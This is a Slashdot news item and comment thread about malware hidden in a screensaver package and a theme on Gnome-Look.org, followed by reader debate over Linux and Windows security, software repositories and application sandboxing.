Malware Found Hidden In Screensaver On Gnome-Look 611
AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instruction on cleansing your system.
Re:Not more safe (Score:5, Interesting)
It looks like it's following the same pattern as Windows malware, too: make a cool screensaver, post it to sharing sites, hope people tell their friends about it. That was a common malware vector for Windows in the early part of this decade. Next there'll be dodgy "codecs" on pr0n sites, and once people start using malware scanners for Linux, they'll make dodgy fake antivirus software to con gullible users. Netbooks may be great for attracting attention to Linux, but we have to remember that this will include the kind of attention that no-one wants.
Re:Not more safe (Score:5, Interesting)
You kind of have a point, but the fact is, you need root privileges to install a .deb, and I have quite successfully installed gtk/gtk2 themes/icons/etc without admin privileges. If I downloaded a .deb from a random site and then installed it, it would be just like running a .exe on windows, but for most things I need to do on linux, I don't actually have to take that risk, while on Windows it seems everything is a .exe. Not sure about screensavers, but it seems this was, like 90% of viruses for any platform, a hack relying on stupid users elevating the virus to root authority themselves.
Repositories are getting a lot better too, I don't use ubuntu any more but when I left the PPA was in ascendancy, which seemed to allow a much better enforcement of security while still letting 3rd party stuff in.
Re:Not more safe (Score:3, Interesting)
Any (good) linux sysadmin knows that there has been many Linux worms in the history. Yes, history. You're also referencing to a 2003 Windows worm here.
Conficker aside, such worms are pretty much in history. Most malware now a days comes via trojans, and any OS can't protect against that unless it's totally locked down (like iPhone)
Re:Not more safe (Score:5, Interesting)
Except one would hope that you could trust what you get from a site like this. Not everyone can scour the source/binary of every app they get from a 'trusted' site.
And if you cant trust the 'trusted' sites for the free stuff, then the entire FreeOS movement is dead in its tracks.
Re:Not more safe (Score:3, Interesting)
There's a middle ground that can maximize protection against trojans (of course, nothing can protect against completely unwary users), and that's using something a model where untrusted apps are (whether by running through app-specific accounts or otherwise) required to be given fairly finely grained permissions on installation before accessing resources.
While Linux distros provided somewhat more protection against users being unknowingly tricked into performing dangerous tasks by providing elegant, non-intrusive ways to provide the control users need without always running as a superuser before Windows did much in that regard, it shares with Windows a fairly all or nothing security model in many regards that is particularly susceptible to trojans.
Re:Not more safe (Score:3, Interesting)
And thus you raise the threshold for entry for new third-party software.
Re:Not more safe (Score:5, Interesting)
Here's an idea. Feel free to agree, disagree, tear it apart, whatever...
Why not have a kernel network access logging module with a userland process that periodically reports to users which programs are accessing the TCP/IP network? Say once a week or once a month or something. The number of programs that do this for many users is quite low. Probably Firefox, Thunderbird, Opera, uTorrent, a short list of other programs. Users then have an opportunity to ignore those programs on future reports. Users now have a good idea if there are changes to their system that might affect security.
There would still be opportunity for malware to access the internet, but users would either 1) notice it or 2) it would make the malware work in very complicated, noticeable ways(like uploading data to a website using a URL).
Re:Not more safe (Score:4, Interesting)
Re:Not more safe (Score:4, Interesting)
Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.
Yes it would, and in this would I would add the google repository, and perhaps the apple repository. Anyone could set up a repository (same as you can with debian), and sign their packages, but if they got compromised, or let crap in, then I'd be wary of using them in the future.
The problem with the iphone appstore is there's only one. You cant add a competitors.
Re:Not more safe (Score:1, Interesting)
Re:Repositories! (Score:3, Interesting)
The inherent problem with the iPhone is that you can only go to one store to buy apps (namely iTunes). With Repos you can pick and choose which stores you trust and which you don't. Much like how I choose if I want to buy software from BigBoxMart or BestStolen. The Internet in general could (since I am using a store analogy apparently) be seen as buying stuff off the street. Yeah, the stuff looks cool and at these bargain prices you can't beat. But I do need to exercise some caution when I flash my wallet to some guy hanging out the back of a van.
So yes, I agree, I'm not too hip on the one store to rule them all policy. But I do believe that the store concept actually has some utility to offer if given the ability to go to another store should I so choose later. I obviously don't want to exclude the random vendor on the street that is selling hand made crafts, or even the random kisok by the bus stop selling phones. I do however what to keep in mind the burly looking thug over there selling "Snoby" Radios. I think it is all a matter of getting people to get inside a way of thinking.
To me, and that only applies to me, Mac OSX screams "Hey buy more shiny Apple stuff" (Security by insulating ones self by coolness). Linux says to me "Hey subscribe to a Repo because we are always changing stuff and you want to have the latest build." (Security by trust of subscription [or maybe sheer geekness]). Windows just looks like, "Hey we're cool with everyone, you want herpes? No problem we're cool with that. Want to do really neat spreadsheets? We're cool with that too." (Insecurity by being a software whore. We're just trying to please everyone.)
Re:Not more safe (Score:2, Interesting)
Both. You are imagining a false dichotomy where there is none.
Getting as much of the 3rd party software as possible into the repository does not preclude raising the threshold of entry.
Some software you want to fall below the threshold is no-name drive-by malware.
Re:Not more safe (Score:2, Interesting)
So what? On my system any script or program can not be executed without my knowledge. Programs can not access outside of specific directories. They are totally ironed and sealed from each other.
Example, I can not even open a picture from any other directory than ~/Pictures directory. And only application to do that is the Gwenview.
Only place to run any script (or binary executable) is from ~/bin but it first need to be profiled to do so. So I can copy what ever binaries to that directory and they can not be executed if I do not give permission first from admin profile.
Re:Not more safe (Score:2, Interesting)
The argument is still the same. I'd rather be able to tell someone who can that they may than tell them they may not.
Anyone can try to fix it. Some may be better than others, but that's doesn't preclude someone from trying. Whereas, on competing systems you may not.
This argument is starting to look stupid specially in a story like this.
Any software that I use has to be made by someone I trust, there is no escape from that, no "but the source is available". I have to trust the maker.
And giving excuses instead of assuming responsibility is not going to gain my trust. There have to be concrete steps to assure this not happens again. No excuses.
Re:At least it was fixable. (Score:4, Interesting)
And saying the problem is not in the kernel but the software applications doesn't cut it either. The same could be said for many of the windows issues, it's just that the software applications in question are in every install and part of the windows user environment. It's no different than applications that might be part of the ubuntu user environment (gnome, samba, etc) etc.
Phil
Re:At least it was fixable. (Score:3, Interesting)
To refute your point: Malware can get its hooks into Windows in a variety of different ways, and removal often requires specialized tools. For example, I had to remove one of those hideous fake-antivirus programs from a neighbor's computer. Real antivirus was no help. MalwareBytes Anti-malware couldn't get rid of it. Going into Safe Mode and manually cleaning things out didn't even work. I had to search the Internet and use a specialized tool to finally uproot that crap. (And, while I trusted it, the removal tool could have also been malware, I had no way to tell)
So: Linux gets infected, smart user can eliminate it. Windows gets infected, smart user still needs to rely on either antivirus or malware-specific removal tools.
Re:Not more safe (Score:5, Interesting)
My mother managed to get some nearly-impossible-to-remove scareware on her (Windows) netbook. She swears up and down that she never visited any sketchy sites, had AV (but no anti-malware), etc. She was basically using it for several things:
1) Visiting various newspapers' websites
2) Webmail (a dedicated server for her business)
3) Word processing (OpenOffice.org)
4) Spider Solitaire
5) A few online games (jigsaw puzzles, sudoku, presumably flash-based) she found on Google. I think this is the most likely vector, but she uses the same websites all the time.
6) Visiting certain reputable, ad-free (AFAIK) sites.
She is smart enough to never download/run/open suspicious programs/files/etc and she was using Firefox 3.5. This thing was able to prevent itself from being uninstalled easily. On Linux, she could have simply killed any offending processes (O.K. that's nontrivial, but no root permissions needed in theory) and check the (graphical, so-easy-to-use-a-caveman^H^Hgrandma-could-do-it) Gnome startup programs tool for suspicious entries. On Windows, we eventually had to use "System restore" (an OS feature) -- which the program could potentially have disabled had the malware author thought to do so (it was totally rooted -- the malware was preventing the installation of some anti-malware programs) and then download the anti-malware program that had previously failed to install. Windows Vista/7 are probably more secure than XP which she has, but I'm still reluctant to blame all Windows security issues on user stupidity. Now I have her running Firefox+NoScript so that it (hopefully) won't happen again, but that's mostly because she refuses to switch to Linux. Most users would be running IE7 or so... not Firefox+NoScript. This is clearly not just "user stupidity" -- it's a windows genuine advantage^H^Hbug.
Re:Removal instructions from the site (Score:2, Interesting)
The only cure is education.
Wait, what ? Slashdot keeps telling me the user is not a factor in malware infections, how will "education" help ?
Re:Not more safe (Score:5, Interesting)
No, even the iphone has vulnerabilities. Locking down a system does not fix vulnerabilities, it only hides them from public view. An open system is more secure as everyone know when a vulnerability is discovered and syadmin's can make work arounds (or even pull the system down) until a patch is developed. With a closed system there is less chance of an exploited vulnerability being discovered by the people who want to fix it or are affected by it.
Re:Not more safe (Score:3, Interesting)
Re:Not more safe (Score:3, Interesting)
/etc might not be the same as the Windows registry (I agree with this statement, /etc is much more manageable), but the gconf registry is looking more and more like it every month. You can say gnome isn't an integral part of Linux, but it's installed on the majority of end-users systems nowadays so for these purposes, it pretty much is...
Re:Linux needs a "Zone Alarm" like program (Score:2, Interesting)
I suspect the GP is talking about the interactive features of Zone Alarm. My understanding is that it only allows outgoing network traffic from known executables that the user has allowed. If an executable hasn't requested network access before, or if an executable that previously asked for access and was granted it but has now been modified (an upgrade/overwritten by malware/...) then Zone Alarm will ask the user again if network access should be granted. It also notes that the executable has previously asked for access and that the file has changed since the last access. L7 filtering is a good start, but it's the user interaction at the time of network access that makes Zone Alarm really useful.